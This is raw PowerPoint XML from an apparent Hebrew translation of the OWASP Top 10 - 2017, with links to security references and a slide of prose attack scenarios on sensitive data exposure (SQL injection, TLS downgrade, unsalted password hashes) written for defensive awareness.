TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#160;Authentication" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_stuffing" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Shee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0"/>
            <a:ext cx="6858000" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B">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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWASP_logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large.png">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5094000" y="8532000"/>
            <a:ext cx="1081144" cy="257976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="6454570" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>עשרת סיכוני האבטחה הגדולים ביותר בפיתוח</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Web </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="8636913"/>
            <a:ext cx="4389568" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="110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This work is licensed under a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="110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br>
            <a:r>
              <a:rPr lang="en-US" sz="110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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Creative Commons Attribution-ShareAlike 4.0 International License</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="110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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Grafik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90600" y="4572000"/>
            <a:ext cx="4876397" cy="3248899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="8758980"/>
            <a:ext cx="1630232" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="110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https://owasp.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23237749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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> יישום מצפין מספרי כרטיסי אשראי בבסיס נתונים באמצעות הצפנת ברירת מחדל ברמת בסיס הנתונים. אולם, מידע זה מפוענח בצורה אוטומטית בעת אחזור, מה שמאפשר למתקפת  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לאחזר מספרי כרטיסי אשראי בצורה גלויה.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אתר אינטרנט אינו אוכף שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> עבור כלל עמודי האתר או תומך בהצפנה חלשה. תוקף מנטר את תעבורת הרשת (לדוגמה ברשת אלחוטית בלתי מאובטחת), משנה את החיבור מ-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ל-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, מאזין לבקשות, וגונב את מזהה ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> של המשתמש. התוקף משדר מחדש את ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> וגונב את מזהה האימות של המשתמש, נכנס ל-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> של המשתמש ומעדכן מידע פרטי. לחלופין, התוקף עשוי לשבש את כל המידע המועבר ברשת, לדוגמה שינוי הנמען בתהליך העברת כסף.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בסיס הנתונים של הסיסמאות אינו משתמש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>salted hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או מאחסן סיסמאות בצורה בלתי מאובטחת. חולשה במנגנון העלאת קבצים מאפשרת לתוקף לאחזר את הסיסמאות. כל ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר לא עברו תהליך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ניתן לפענוח באמצעות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rainbow table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר חושבה מראש. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר חושבו בצורה בלתי מאובטחת או באמצעות פונקציות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מהירות, עשויות להיפרץ ע"י מעבדי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, אפילו אם עברו תהליך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3131840"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
